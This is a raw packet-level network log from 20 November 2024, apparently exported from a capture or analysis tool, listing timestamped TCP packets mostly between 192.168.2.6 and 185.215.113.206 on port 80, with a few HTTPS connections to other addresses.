                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333228111 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333228111 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333228111 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333281040 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333281040 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333292007 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333303928 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333334923 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333334923 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333359003 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333370924 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333381891 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333400965 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333410978 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333425045 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333435059 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333435059 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333478928 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333478928 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.394007921 CET49978443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.394031048 CET44349978204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.394037008 CET49982443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417129993 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417145014 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417151928 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417203903 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417215109 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417227030 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417237043 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417243004 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417253971 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417274952 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417285919 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417298079 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417299986 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417299986 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417299986 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417309999 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417323112 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417346954 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417359114 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417361021 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417409897 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417409897 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417573929 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417679071 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417690039 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417702913 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417709112 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417714119 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417721033 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417737007 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417748928 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417762041 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417773962 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417777061 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417785883 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417807102 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417817116 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417829037 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417838097 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417855024 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417855024 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417857885 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417872906 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417882919 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417893887 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417906046 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417937994 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417937994 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417937994 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417957067 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417977095 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.417989016 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418000937 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418018103 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418029070 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418040037 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418060064 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418121099 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418200016 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418211937 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418224096 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418236971 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418291092 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418291092 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418291092 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418293953 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418308020 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418319941 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418332100 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418343067 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418437004 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418437004 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418584108 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418595076 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418606997 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418673992 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418684959 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418697119 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418709040 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418720961 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418732882 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418740988 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418741941 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418741941 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418777943 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418790102 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418801069 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418812037 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418824911 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418838978 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418853045 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418853998 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418853998 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418859959 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418870926 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418885946 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418899059 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418910027 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418931007 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418942928 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418956041 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418967962 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418999910 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418999910 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.418999910 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419023991 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419027090 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419040918 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419051886 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419064045 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419074059 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419087887 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419100046 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419110060 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419131041 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419131041 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419131041 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419195890 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419269085 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419287920 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419298887 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419311047 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419328928 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419336081 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419337034 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419342041 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419353962 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419364929 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419375896 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419385910 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419409037 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419421911 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419423103 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419423103 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419424057 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419444084 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419454098 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419466019 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419476986 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419488907 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419502020 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419511080 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419511080 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419511080 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419514894 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419528008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419540882 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419547081 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419591904 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419595003 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419595003 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419595003 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419611931 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419624090 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419636011 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419653893 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419653893 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419653893 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419667006 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419678926 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419689894 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419701099 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419713020 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419728041 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419737101 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419737101 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419737101 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419739008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419753075 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419763088 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419774055 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419819117 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419819117 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419819117 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419840097 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419852018 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419863939 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419878006 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419888973 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419900894 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419945955 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419945955 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.419945955 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.420021057 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.420223951 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.424901009 CET49996443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.424940109 CET44349996162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.425195932 CET49996443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.425972939 CET49979443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.427232027 CET49997443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.427253962 CET44349997162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.427588940 CET49997443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.429831028 CET49997443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.429845095 CET44349997162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.430084944 CET49996443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.430104017 CET44349996162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504020929 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504033089 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504041910 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504054070 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504163027 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504175901 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504183054 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504193068 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504204035 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504225016 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504225016 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504225016 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504265070 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504483938 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504494905 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504507065 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504515886 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504525900 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504537106 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504582882 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504582882 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504623890 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504633904 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504646063 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504654884 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504664898 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504682064 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504692078 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504700899 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504700899 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504702091 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504714012 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504729986 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504730940 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504743099 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504748106 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504753113 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504765987 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504775047 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504784107 CET4991080192.168.2.6185.215.113.206
